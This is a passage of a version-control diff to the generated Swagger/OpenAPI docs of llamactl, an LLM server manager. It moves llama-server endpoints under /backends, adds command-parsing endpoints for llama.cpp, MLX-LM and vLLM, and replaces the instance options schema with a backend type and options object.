"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/backends/llama-cpp/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command",
"tags": [
"backends"
],
"summary": "Get version of llama server",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/mlx/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses MLX-LM server command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse mlx_lm.server command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/backends/vllm/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses a vLLM serve command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse vllm serve command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/instances": {
"get": {
"security": [
@@ -505,90 +742,6 @@ const docTemplate = `{
}
}
},
"/server/devices": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server",
"tags": [
"server"
],
"summary": "List available devices for llama server",
"responses": {
"200": {
"description": "List of devices",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/server/help": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command",
"tags": [
"server"
],
"summary": "Get help for llama server",
"responses": {
"200": {
"description": "Help text",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/server/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command",
"tags": [
"server"
],
"summary": "Get version of llama server",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/v1/": {
"post": {
"security": [
@@ -609,7 +762,7 @@ const docTemplate = `{
"description": "OpenAI response"
},
"400": {
"description": "Invalid request body or model name",
"description": "Invalid request body or instance name",
"schema": {
"type": "string"
}
@@ -681,519 +834,63 @@ const docTemplate = `{
}
},
"definitions": {
"backends.BackendType": {
"type": "string",
"enum": [
"llama_cpp",
"mlx_lm",
"vllm"
],
"x-enum-varnames": [
"BackendTypeLlamaCpp",
"BackendTypeMlxLm",
"BackendTypeVllm"
]
},
"instance.CreateInstanceOptions": {
"type": "object",
"properties": {
"alias": {
"type": "string"
},
"api_key": {
"type": "string"
},
"api_key_file": {
"type": "string"
},
"auto_restart": {
"description": "Auto restart",
"type": "boolean"
},
"batch_size": {
"type": "integer"
"backend_options": {
"type": "object",
"additionalProperties": {}
},
"cache_reuse": {
"type": "integer"
"backend_type": {
"$ref": "#/definitions/backends.BackendType"
},
"cache_type_k": {
"type": "string"
},
"cache_type_k_draft": {
"type": "string"
},
"cache_type_v": {
"type": "string"
},
"cache_type_v_draft": {
"type": "string"
},
"chat_template": {
"type": "string"
},
"chat_template_file": {
"type": "string"
},
"chat_template_kwargs": {
"type": "string"
},
"check_tensors": {
"type": "boolean"
},
"cont_batching": {
"type": "boolean"
},
"control_vector": {
"type": "array",
"items": {
"type": "string"
}
},
"control_vector_layer_range": {
"type": "string"
},
"control_vector_scaled": {
"type": "array",
"items": {
"type": "string"
}
},
"cpu_mask": {
"type": "string"
},
"cpu_mask_batch": {
"type": "string"
},
"cpu_range": {
"type": "string"
},
"cpu_range_batch": {
"type": "string"
},
"cpu_strict": {
"type": "integer"
},
"cpu_strict_batch": {
"type": "integer"
},
"ctx_size": {
"type": "integer"
},
"ctx_size_draft": {
"type": "integer"
},
"defrag_thold": {
"type": "number"
},
"device": {
"type": "string"
},
"device_draft": {
"type": "string"
},
"draft_max": {
"type": "integer"
},
"draft_min": {
"type": "integer"
},
"draft_p_min": {
"type": "number"
},
"dry_allowed_length": {
"type": "integer"
},
"dry_base": {
"type": "number"
},
"dry_multiplier": {
"type": "number"
},
"dry_penalty_last_n": {
"type": "integer"
},
"dry_sequence_breaker": {
"type": "array",
"items": {
"type": "string"
}
},
"dump_kv_cache": {
"type": "boolean"
},
"dynatemp_exp": {
"type": "number"
},
"dynatemp_range": {
"type": "number"
},
"embd_bge_small_en_default": {
"description": "Default model params",
"type": "boolean"
},
"embd_e5_small_en_default": {
"type": "boolean"
},
"embd_gte_small_default": {
"type": "boolean"
},
"embedding": {
"type": "boolean"
},
"escape": {
"type": "boolean"
},
"fim_qwen_14b_spec": {
"type": "boolean"
},
"fim_qwen_1_5b_default": {
"type": "boolean"
},
"fim_qwen_3b_default": {
"type": "boolean"
},
"fim_qwen_7b_default": {
"type": "boolean"
},
"fim_qwen_7b_spec": {
"type": "boolean"
},
"flash_attn": {
"type": "boolean"
},
"frequency_penalty": {
"type": "number"
},
"gpu_layers": {
"type": "integer"
},
"gpu_layers_draft": {
"type": "integer"
},
"grammar": {
"type": "string"
},
"grammar_file": {
"type": "string"
},
"hf_file": {
"type": "string"
},
"hf_file_v": {
"type": "string"
},
"hf_repo": {
"type": "string"
},
"hf_repo_draft": {
"type": "string"
},
"hf_repo_v": {
"type": "string"
},
"hf_token": {
"type": "string"
},
"host": {
"type": "string"
},
"ignore_eos": {
"type": "boolean"
},
"jinja": {
"type": "boolean"
},
"json_schema": {
"type": "string"
},
"json_schema_file": {
"type": "string"
},
"keep": {
"type": "integer"
},
"log_colors": {
"type": "boolean"
},
"log_disable": {
"type": "boolean"
},
"log_file": {
"type": "string"
},
"log_prefix": {
"type": "boolean"
},
"log_timestamps": {
"type": "boolean"
},
"logit_bias": {
"type": "array",
"items": {
"type": "string"
}
},
"lora": {
"type": "array",
"items": {
"type": "string"
}
},
"lora_init_without_apply": {
"type": "boolean"
},
"lora_scaled": {
"type": "array",
"items": {
"type": "string"
}
},
"main_gpu": {
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"max_restarts": {
"type": "integer"
},
"metrics": {
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"min_p": {
"type": "number"
},
"mirostat": {
"type": "integer"
},
"mirostat_ent": {
"type": "number"
},
"mirostat_lr": {
"type": "number"
},
"mlock": {
"type": "boolean"
},
"mmproj": {
"type": "string"
},
"mmproj_url": {
"type": "string"
},
"model": {
"type": "string"
},
"model_draft": {
"type": "string"
},
"model_url": {
"type": "string"
},
"model_vocoder": {
"description": "Audio/TTS params",
"type": "string"
},
"no_cont_batching": {
"type": "boolean"
},
"no_context_shift": {
"description": "Example-specific params",
"type": "boolean"
},
"no_escape": {
"type": "boolean"
},
"no_kv_offload": {
"type": "boolean"
},
"no_mmap": {
"type": "boolean"
},
"no_mmproj": {
"type": "boolean"
},
"no_mmproj_offload": {
"type": "boolean"
},
"no_perf": {
"type": "boolean"
},
"no_prefill_assistant": {
"type": "boolean"
},
"no_slots": {
"type": "boolean"
},
"no_warmup": {
"type": "boolean"
},
"no_webui": {
"type": "boolean"
},
"numa": {
"type": "string"
},
"override_kv": {
"type": "array",
"items": {
"type": "string"
}
},
"override_tensor": {
"type": "array",
"items": {
"type": "string"
}
},
"parallel": {
"type": "integer"
},
"path": {
"type": "string"
},
"poll": {
"type": "integer"
},
"poll_batch": {
"type": "integer"
},
"pooling": {
"type": "string"
},
"port": {
"type": "integer"
},
"predict": {
"type": "integer"
},
"presence_penalty": {
"type": "number"
},
"prio": {
"type": "integer"
},
"prio_batch": {
"type": "integer"
},
"props": {
"type": "boolean"
},
"reasoning_budget": {
"type": "integer"
},
"reasoning_format": {
"type": "string"
},
"repeat_last_n": {
"type": "integer"
},
"repeat_penalty": {
"type": "number"
},
"reranking": {
"type": "boolean"
},
"restart_delay_seconds": {
"description": "RestartDelay duration in seconds",
"type": "integer"
},
"rope_freq_base": {
"type": "number"
},
"rope_freq_scale": {
"type": "number"
},
"rope_scale": {
"type": "number"
},
"rope_scaling": {
"type": "string"
},
"samplers": {
"description": "Sampling params",
"type": "string"
},
"sampling_seq": {
"type": "string"
},
"seed": {
"type": "integer"
},
"slot_prompt_similarity": {
"type": "number"
},
"slot_save_path": {
"type": "string"
},
"slots": {
"type": "boolean"
},
"special": {
"type": "boolean"
},
"split_mode": {
"type": "string"
},
"spm_infill": {
"type": "boolean"
},
"ssl_cert_file": {
"type": "string"
},
"ssl_key_file": {
"type": "string"
},
"temp": {
"type": "number"
},
"tensor_split": {
"type": "string"
},
"threads": {
"type": "integer"
},
"threads_batch": {
"type": "integer"
},
"threads_http": {
"type": "integer"
},
"timeout": {
"type": "integer"
},
"top_k": {
"type": "integer"
},
"top_p": {
"type": "number"
},
"tts_use_guide_tokens": {
"type": "boolean"
},
"typical": {
"type": "number"
},
"ubatch_size": {
"type": "integer"
},
"verbose": {
"type": "boolean"
},
"verbose_prompt": {
"description": "Common params",
"type": "boolean"
},
"verbosity": {
"type": "integer"
},
"xtc_probability": {
"type": "number"
},
"xtc_threshold": {
"type": "number"
},
"yarn_attn_factor": {
"type": "number"
},
"yarn_beta_fast": {
"type": "number"
},
"yarn_beta_slow": {
"type": "number"
},
"yarn_ext_factor": {
"type": "number"
},
"yarn_orig_ctx": {
"restart_delay": {
"description": "seconds",
"type": "integer"
}
}
},
"instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": {
"type": "object",
"properties": {
@@ -1204,9 +901,13 @@ const docTemplate = `{
"name": {
"type": "string"
},
"running": {
"status": {
"description": "Status",
"type": "boolean"
"allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
}
}
},
@@ -1240,6 +941,14 @@ const docTemplate = `{
"type": "string"
}
}
},
"server.ParseCommandRequest": {
"type": "object",
"properties": {
"command": {
"type": "string"
}
}
}
}
}`

View File

@@ -12,6 +12,243 @@
},
"basePath": "/api/v1",
"paths": {
"/backends/llama-cpp/devices": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server",
"tags": [
"backends"
],
"summary": "List available devices for llama server",
"responses": {
"200": {
"description": "List of devices",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/llama-cpp/help": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command",
"tags": [
"backends"
],
"summary": "Get help for llama server",
"responses": {
"200": {
"description": "Help text",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/llama-cpp/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses a llama-server command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse llama-server command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/backends/llama-cpp/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command",
"tags": [
"backends"
],
"summary": "Get version of llama server",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/mlx/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses MLX-LM server command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse mlx_lm.server command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/backends/vllm/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses a vLLM serve command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse vllm serve command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/instances": {
"get": {
"security": [
@@ -498,90 +735,6 @@
}
}
},
"/server/devices": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server",
"tags": [
"server"
],
"summary": "List available devices for llama server",
"responses": {
"200": {
"description": "List of devices",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/server/help": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command",
"tags": [
"server"
],
"summary": "Get help for llama server",
"responses": {
"200": {
"description": "Help text",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/server/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command",
"tags": [
"server"
],
"summary": "Get version of llama server",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/v1/": {
"post": {
"security": [
@@ -602,7 +755,7 @@
"description": "OpenAI response"
},
"400": {
"description": "Invalid request body or model name",
"description": "Invalid request body or instance name",
"schema": {
"type": "string"
}
@@ -674,519 +827,63 @@
}
},
"definitions": {
"backends.BackendType": {
"type": "string",
"enum": [
"llama_cpp",
"mlx_lm",
"vllm"
],
"x-enum-varnames": [
"BackendTypeLlamaCpp",
"BackendTypeMlxLm",
"BackendTypeVllm"
]
},
"instance.CreateInstanceOptions": {
"type": "object",
"properties": {
"alias": {
"type": "string"
},
"api_key": {
"type": "string"
},
"api_key_file": {
"type": "string"
},
"auto_restart": {
"description": "Auto restart",
"type": "boolean"
},
"batch_size": {
"type": "integer"
"backend_options": {
"type": "object",
"additionalProperties": {}
},
"cache_reuse": {
"type": "integer"
"backend_type": {
"$ref": "#/definitions/backends.BackendType"
},
"cache_type_k": {
"type": "string"
},
"cache_type_k_draft": {
"type": "string"
},
"cache_type_v": {
"type": "string"
},
"cache_type_v_draft": {
"type": "string"
},
"chat_template": {
"type": "string"
},
"chat_template_file": {
"type": "string"
},
"chat_template_kwargs": {
"type": "string"
},
"check_tensors": {
"type": "boolean"
},
"cont_batching": {
"type": "boolean"
},
"control_vector": {
"type": "array",
"items": {
"type": "string"
}
},
"control_vector_layer_range": {
"type": "string"
},
"control_vector_scaled": {
"type": "array",
"items": {
"type": "string"
}
},
"cpu_mask": {
"type": "string"
},
"cpu_mask_batch": {
"type": "string"
},
"cpu_range": {
"type": "string"
},
"cpu_range_batch": {
"type": "string"
},
"cpu_strict": {
"type": "integer"
},
"cpu_strict_batch": {
"type": "integer"
},
"ctx_size": {
"type": "integer"
},
"ctx_size_draft": {
"type": "integer"
},
"defrag_thold": {
"type": "number"
},
"device": {
"type": "string"
},
"device_draft": {
"type": "string"
},
"draft_max": {
"type": "integer"
},
"draft_min": {
"type": "integer"
},
"draft_p_min": {
"type": "number"
},
"dry_allowed_length": {
"type": "integer"
},
"dry_base": {
"type": "number"
},
"dry_multiplier": {
"type": "number"
},
"dry_penalty_last_n": {
"type": "integer"
},
"dry_sequence_breaker": {
"type": "array",
"items": {
"type": "string"
}
},
"dump_kv_cache": {
"type": "boolean"
},
"dynatemp_exp": {
"type": "number"
},
"dynatemp_range": {
"type": "number"
},
"embd_bge_small_en_default": {
"description": "Default model params",
"type": "boolean"
},
"embd_e5_small_en_default": {
"type": "boolean"
},
"embd_gte_small_default": {
"type": "boolean"
},
"embedding": {
"type": "boolean"
},
"escape": {
"type": "boolean"
},
"fim_qwen_14b_spec": {
"type": "boolean"
},
"fim_qwen_1_5b_default": {
"type": "boolean"
},
"fim_qwen_3b_default": {
"type": "boolean"
},
"fim_qwen_7b_default": {
"type": "boolean"
},
"fim_qwen_7b_spec": {
"type": "boolean"
},
"flash_attn": {
"type": "boolean"
},
"frequency_penalty": {
"type": "number"
},
"gpu_layers": {
"type": "integer"
},
"gpu_layers_draft": {
"type": "integer"
},
"grammar": {
"type": "string"
},
"grammar_file": {
"type": "string"
},
"hf_file": {
"type": "string"
},
"hf_file_v": {
"type": "string"
},
"hf_repo": {
"type": "string"
},
"hf_repo_draft": {
"type": "string"
},
"hf_repo_v": {
"type": "string"
},
"hf_token": {
"type": "string"
},
"host": {
"type": "string"
},
"ignore_eos": {
"type": "boolean"
},
"jinja": {
"type": "boolean"
},
"json_schema": {
"type": "string"
},
"json_schema_file": {
"type": "string"
},
"keep": {
"type": "integer"
},
"log_colors": {
"type": "boolean"
},
"log_disable": {
"type": "boolean"
},
"log_file": {
"type": "string"
},
"log_prefix": {
"type": "boolean"
},
"log_timestamps": {
"type": "boolean"
},
"logit_bias": {
"type": "array",
"items": {
"type": "string"
}
},
"lora": {
"type": "array",
"items": {
"type": "string"
}
},
"lora_init_without_apply": {
"type": "boolean"
},
"lora_scaled": {
"type": "array",
"items": {
"type": "string"
}
},
"main_gpu": {
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"max_restarts": {
"type": "integer"
},
"metrics": {
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"min_p": {
"type": "number"
},
"mirostat": {
"type": "integer"
},
"mirostat_ent": {
"type": "number"
},
"mirostat_lr": {
"type": "number"
},
"mlock": {
"type": "boolean"
},
"mmproj": {
"type": "string"
},
"mmproj_url": {
"type": "string"
},
"model": {
"type": "string"
},
"model_draft": {
"type": "string"
},
"model_url": {
"type": "string"
},
"model_vocoder": {
"description": "Audio/TTS params",
"type": "string"
},
"no_cont_batching": {
"type": "boolean"
},
"no_context_shift": {
"description": "Example-specific params",
"type": "boolean"
},
"no_escape": {
"type": "boolean"
},
"no_kv_offload": {
"type": "boolean"
},
"no_mmap": {
"type": "boolean"
},
"no_mmproj": {
"type": "boolean"
},
"no_mmproj_offload": {
"type": "boolean"
},
"no_perf": {
"type": "boolean"
},
"no_prefill_assistant": {
"type": "boolean"
},
"no_slots": {
"type": "boolean"
},
"no_warmup": {
"type": "boolean"
},
"no_webui": {
"type": "boolean"
},
"numa": {
"type": "string"
},
"override_kv": {
"type": "array",
"items": {
"type": "string"
}
},
"override_tensor": {
"type": "array",
"items": {
"type": "string"
}
},
"parallel": {
"type": "integer"
},
"path": {
"type": "string"
},
"poll": {
"type": "integer"
},
"poll_batch": {
"type": "integer"
},
"pooling": {
"type": "string"
},
"port": {
"type": "integer"
},
"predict": {
"type": "integer"
},
"presence_penalty": {
"type": "number"
},
"prio": {
"type": "integer"
},
"prio_batch": {
"type": "integer"
},
"props": {
"type": "boolean"
},
"reasoning_budget": {
"type": "integer"
},
"reasoning_format": {
"type": "string"
},
"repeat_last_n": {
"type": "integer"
},
"repeat_penalty": {
"type": "number"
},
"reranking": {
"type": "boolean"
},
"restart_delay_seconds": {
"description": "RestartDelay duration in seconds",
"type": "integer"
},
"rope_freq_base": {
"type": "number"
},
"rope_freq_scale": {
"type": "number"
},
"rope_scale": {
"type": "number"
},
"rope_scaling": {
"type": "string"
},
"samplers": {
"description": "Sampling params",
"type": "string"
},
"sampling_seq": {
"type": "string"
},
"seed": {
"type": "integer"
},
"slot_prompt_similarity": {
"type": "number"
},
"slot_save_path": {
"type": "string"
},
"slots": {
"type": "boolean"
},
"special": {
"type": "boolean"
},
"split_mode": {
"type": "string"
},
"spm_infill": {
"type": "boolean"
},
"ssl_cert_file": {
"type": "string"
},
"ssl_key_file": {
"type": "string"
},
"temp": {
"type": "number"
},
"tensor_split": {
"type": "string"
},
"threads": {
"type": "integer"
},
"threads_batch": {
"type": "integer"
},
"threads_http": {
"type": "integer"
},
"timeout": {
"type": "integer"
},
"top_k": {
"type": "integer"
},
"top_p": {
"type": "number"
},
"tts_use_guide_tokens": {
"type": "boolean"
},
"typical": {
"type": "number"
},
"ubatch_size": {
"type": "integer"
},
"verbose": {
"type": "boolean"
},
"verbose_prompt": {
"description": "Common params",
"type": "boolean"
},
"verbosity": {
"type": "integer"
},
"xtc_probability": {
"type": "number"
},
"xtc_threshold": {
"type": "number"
},
"yarn_attn_factor": {
"type": "number"
},
"yarn_beta_fast": {
"type": "number"
},
"yarn_beta_slow": {
"type": "number"
},
"yarn_ext_factor": {
"type": "number"
},
"yarn_orig_ctx": {
"restart_delay": {
"description": "seconds",
"type": "integer"
}
}
},
"instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": {
"type": "object",
"properties": {
@@ -1197,9 +894,13 @@
"name": {
"type": "string"
},
"running": {
"status": {
"description": "Status",
"type": "boolean"
"allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
}
}
},
@@ -1233,6 +934,14 @@
"type": "string"
}
}
},
"server.ParseCommandRequest": {
"type": "object",
"properties": {
"command": {
"type": "string"
}
}
}
}
}

View File

@@ -1,349 +1,47 @@
basePath: /api/v1
definitions:
backends.BackendType:
enum:
- llama_cpp
- mlx_lm
- vllm
type: string
x-enum-varnames:
- BackendTypeLlamaCpp
- BackendTypeMlxLm
- BackendTypeVllm
instance.CreateInstanceOptions:
properties:
alias:
type: string
api_key:
type: string
api_key_file:
type: string
auto_restart:
description: Auto restart
type: boolean
batch_size:
type: integer
cache_reuse:
type: integer
cache_type_k:
type: string
cache_type_k_draft:
type: string
cache_type_v:
type: string
cache_type_v_draft:
type: string
chat_template:
type: string
chat_template_file:
type: string
chat_template_kwargs:
type: string
check_tensors:
type: boolean
cont_batching:
type: boolean
control_vector:
items:
type: string
type: array
control_vector_layer_range:
type: string
control_vector_scaled:
items:
type: string
type: array
cpu_mask:
type: string
cpu_mask_batch:
type: string
cpu_range:
type: string
cpu_range_batch:
type: string
cpu_strict:
type: integer
cpu_strict_batch:
type: integer
ctx_size:
type: integer
ctx_size_draft:
type: integer
defrag_thold:
type: number
device:
type: string
device_draft:
type: string
draft_max:
type: integer
draft_min:
type: integer
draft_p_min:
type: number
dry_allowed_length:
type: integer
dry_base:
type: number
dry_multiplier:
type: number
dry_penalty_last_n:
type: integer
dry_sequence_breaker:
items:
type: string
type: array
dump_kv_cache:
type: boolean
dynatemp_exp:
type: number
dynatemp_range:
type: number
embd_bge_small_en_default:
description: Default model params
type: boolean
embd_e5_small_en_default:
type: boolean
embd_gte_small_default:
type: boolean
embedding:
type: boolean
escape:
type: boolean
fim_qwen_1_5b_default:
type: boolean
fim_qwen_3b_default:
type: boolean
fim_qwen_7b_default:
type: boolean
fim_qwen_7b_spec:
type: boolean
fim_qwen_14b_spec:
type: boolean
flash_attn:
type: boolean
frequency_penalty:
type: number
gpu_layers:
type: integer
gpu_layers_draft:
type: integer
grammar:
type: string
grammar_file:
type: string
hf_file:
type: string
hf_file_v:
type: string
hf_repo:
type: string
hf_repo_draft:
type: string
hf_repo_v:
type: string
hf_token:
type: string
host:
type: string
ignore_eos:
type: boolean
jinja:
type: boolean
json_schema:
type: string
json_schema_file:
type: string
keep:
type: integer
log_colors:
type: boolean
log_disable:
type: boolean
log_file:
type: string
log_prefix:
type: boolean
log_timestamps:
type: boolean
logit_bias:
items:
type: string
type: array
lora:
items:
type: string
type: array
lora_init_without_apply:
type: boolean
lora_scaled:
items:
type: string
type: array
main_gpu:
backend_options:
additionalProperties: {}
type: object
backend_type:
$ref: '#/definitions/backends.BackendType'
idle_timeout:
description: Idle timeout
type: integer
max_restarts:
type: integer
metrics:
on_demand_start:
description: On demand start
type: boolean
min_p:
type: number
mirostat:
type: integer
mirostat_ent:
type: number
mirostat_lr:
type: number
mlock:
type: boolean
mmproj:
type: string
mmproj_url:
type: string
model:
type: string
model_draft:
type: string
model_url:
type: string
model_vocoder:
description: Audio/TTS params
type: string
no_cont_batching:
type: boolean
no_context_shift:
description: Example-specific params
type: boolean
no_escape:
type: boolean
no_kv_offload:
type: boolean
no_mmap:
type: boolean
no_mmproj:
type: boolean
no_mmproj_offload:
type: boolean
no_perf:
type: boolean
no_prefill_assistant:
type: boolean
no_slots:
type: boolean
no_warmup:
type: boolean
no_webui:
type: boolean
numa:
type: string
override_kv:
items:
type: string
type: array
override_tensor:
items:
type: string
type: array
parallel:
type: integer
path:
type: string
poll:
type: integer
poll_batch:
type: integer
pooling:
type: string
port:
type: integer
predict:
type: integer
presence_penalty:
type: number
prio:
type: integer
prio_batch:
type: integer
props:
type: boolean
reasoning_budget:
type: integer
reasoning_format:
type: string
repeat_last_n:
type: integer
repeat_penalty:
type: number
reranking:
type: boolean
restart_delay_seconds:
description: RestartDelay duration in seconds
type: integer
rope_freq_base:
type: number
rope_freq_scale:
type: number
rope_scale:
type: number
rope_scaling:
type: string
samplers:
description: Sampling params
type: string
sampling_seq:
type: string
seed:
type: integer
slot_prompt_similarity:
type: number
slot_save_path:
type: string
slots:
type: boolean
special:
type: boolean
split_mode:
type: string
spm_infill:
type: boolean
ssl_cert_file:
type: string
ssl_key_file:
type: string
temp:
type: number
tensor_split:
type: string
threads:
type: integer
threads_batch:
type: integer
threads_http:
type: integer
timeout:
type: integer
top_k:
type: integer
top_p:
type: number
tts_use_guide_tokens:
type: boolean
typical:
type: number
ubatch_size:
type: integer
verbose:
type: boolean
verbose_prompt:
description: Common params
type: boolean
verbosity:
type: integer
xtc_probability:
type: number
xtc_threshold:
type: number
yarn_attn_factor:
type: number
yarn_beta_fast:
type: number
yarn_beta_slow:
type: number
yarn_ext_factor:
type: number
yarn_orig_ctx:
restart_delay:
description: seconds
type: integer
type: object
instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process:
properties:
created:
@@ -351,9 +49,10 @@ definitions:
type: integer
name:
type: string
running:
status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status
type: boolean
type: object
server.OpenAIInstance:
properties:
@@ -375,6 +74,11 @@ definitions:
object:
type: string
type: object
server.ParseCommandRequest:
properties:
command:
type: string
type: object
info:
contact: {}
description: llamactl is a control server for managing Llama Server instances.
@@ -384,6 +88,153 @@ info:
title: llamactl API
version: "1.0"
paths:
/backends/llama-cpp/devices:
get:
description: Returns a list of available devices for the llama server
responses:
"200":
description: List of devices
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- backends
/backends/llama-cpp/help:
get:
description: Returns the help text for the llama server command
responses:
"200":
description: Help text
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- backends
/backends/llama-cpp/parse-command:
post:
consumes:
- application/json
description: Parses a llama-server command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
"500":
description: Internal Server Error
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse llama-server command
tags:
- backends
/backends/llama-cpp/version:
get:
description: Returns the version of the llama server command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- backends
/backends/mlx/parse-command:
post:
consumes:
- application/json
description: Parses MLX-LM server command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse mlx_lm.server command
tags:
- backends
/backends/vllm/parse-command:
post:
consumes:
- application/json
description: Parses a vLLM serve command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
